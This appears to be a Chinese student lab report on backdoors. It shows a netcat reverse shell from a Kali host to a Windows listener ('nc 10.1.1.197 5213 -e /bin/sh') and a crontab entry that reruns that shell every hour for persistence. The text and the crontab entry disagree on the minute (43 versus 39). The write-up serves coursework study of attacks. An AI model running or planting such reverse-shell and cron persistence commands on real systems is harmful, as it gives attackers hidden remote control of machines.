Exp2 后门原理与实践
实验内容
任务一 使用netcat获取主机操作Shell,cron启动
1.确认kali和主机的ip,关闭防火墙
(192.169.127.132)
(10.1.1.197)2.1.windows 打开监听
c:\your_nc_dir>ncat.exe -l -p 5213- 2.2Linux反弹连接win
root@KaliYL:/var/www/html# nc 10.1.1.197 5213 -e /bin/sh 2.3.windows下获得一个linux shell,可运行任何指令,如ls
c:\your_nc_dir>ncat.exe -l -p 5213 #这条指令是第一步中输入的,不用再输
ls
-2.4 反过来是一样的道理
3.1.crontab指令增加一条定时任务,"-e"表示编辑。
3.2.因为是第一次编辑,故提示选择编辑器,我选择了3,并添加了最后一行。简单说就是在每个小时的第43分钟执行后面的那条指令。
Choose 1-5 [1]: 3
crontab: installing new crontab
m分钟 h小时 dom日期 mon月 dow周几 command执行的命令
39* * * * /bin/netcat 10.1.1.197 5213 -e /bin/sh
(即到39分的时候会运行)